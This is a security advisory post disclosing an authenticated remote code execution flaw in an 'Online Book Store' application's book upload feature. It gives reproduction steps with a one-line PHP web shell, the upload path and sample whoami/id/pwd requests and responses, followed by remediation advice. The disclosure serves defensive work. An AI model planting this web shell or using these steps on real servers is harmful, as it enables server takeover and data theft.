Post cover image

June 10, 2026

Critical — Authenticated Remote Code Execution (RCE) via Unrestricted File Upload

Executive Summary

Hemant Raj Bhati

3 min read

Executive Summary

A critical vulnerability was identified in the Book Management module of the Online Book Store application. The application allows authenticated administrators to upload arbitrary files without sufficient validation of file type, extension, or executable content.

By uploading a malicious PHP web shell, an attacker can execute operating system commands on the underlying server, resulting in Remote Code Execution (RCE). Successful exploitation allows complete compromise of the web application and may lead to full server takeover depending on the hosting environment and system privileges.

Vulnerability Details

FieldValueVulnerability TypeUnrestricted File UploadImpactRemote Code Execution (RCE)SeverityCriticalCWECWE-434Authentication RequiredYes (Administrator)CVSS v3.19.1 (Critical)

Affected Functionality

Book Management Module

Endpoint:

/admin/index.php?page=books

Uploaded files are stored in:

/admin/assets/uploads/

Description

The application fails to properly validate uploaded files before storing them in a web-accessible directory.

An authenticated administrator can upload a PHP file containing arbitrary server-side code. Since uploaded files are placed inside an executable directory and are accessible through the browser, the uploaded PHP file is interpreted by the server and executed.

This behavior allows attackers to run arbitrary operating system commands with the privileges of the web server process.

Steps to Reproduce

Step 1 — Authenticate

Login to the administrative dashboard using valid administrator credentials.

None

Step 2 — Prepare Malicious File

Create the following PHP web shell:

<?php
system($_GET['cmd']);
?>
None

Filename: shell3.php

Step 3 — Upload File

Navigate to:

Master List → Books → New

Upload the malicious PHP file using the image upload functionality.

None

Step 4 — Save Record

Save the book entry.

The application stores the uploaded file inside:

/admin/assets/uploads/

Step 5 — Access Uploaded File

Open the uploaded file directly through the browser.

Example:

http://localhost/book_store/admin/assets/uploads/1781034960_shell3.php

None

Step 6 — Execute Commands

Execute operating system commands using the cmd parameter.

Example:

http://localhost/book_store/admin/assets/uploads/1781034960_shell3.php?cmd=whoami

Response:

www-data

None

Proof of Exploitation

None

Command 1

Request:

?cmd=whoami

Response:

www-data

Command 2

Request:

?cmd=id

Response:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Command 3

Request:

?cmd=pwd

Response:

/var/www/html/book_store/admin/assets/uploads

The responses confirm successful execution of arbitrary operating system commands on the server.

Security Impact

An attacker with administrative access can:

• Execute arbitrary system commands

• Read sensitive application files

• Access database credentials

• Extract customer information

• Modify application source code

• Install backdoors

• Establish persistence

• Pivot to internal infrastructure

• Achieve complete application compromise

Depending on server configuration, this may result in full operating system compromise.

Root Cause

The vulnerability exists because:

  1. File extensions are not adequately restricted.
  2. Uploaded content is not validated.
  3. Executable files can be stored inside a web-accessible directory.
  4. PHP execution is permitted within the uploads directory.
  5. No server-side filtering is implemented to prevent dangerous file types.

Remediation

Immediate Fixes

  1. Restrict uploads to approved image formats only.

Allowed:

  • .jpg
  • .jpeg
  • .png
  • .gif
  • .webp
  1. Validate MIME type server-side.
  2. Validate file signatures (magic bytes).
  3. Rename uploaded files using random identifiers.
  4. Store uploads outside the web root.

Web Server Hardening

Disable PHP execution within the uploads directory.

Apache Example:

<Directory "/uploads"> php_admin_flag engine off

Nginx Example:

location /uploads/ { location ~ .php$ { deny all; } }

Additional Controls

  • Implement allow-list validation.
  • Block dangerous extensions.
  • Perform content inspection.
  • Apply least-privilege permissions.
  • Log and monitor upload activity.

Risk Rating

Severity: Critical

Likelihood: High

Impact: Complete Server Compromise

Overall Risk: Critical

References

CWE-434 — Unrestricted Upload of File with Dangerous Type

OWASP File Upload Security Cheat Sheet

OWASP Top 10 — Security Misconfiguration

Author

Security Researcher: Hemant Raj Bhati Category: Web Application Security Affected Application: Online Book Store System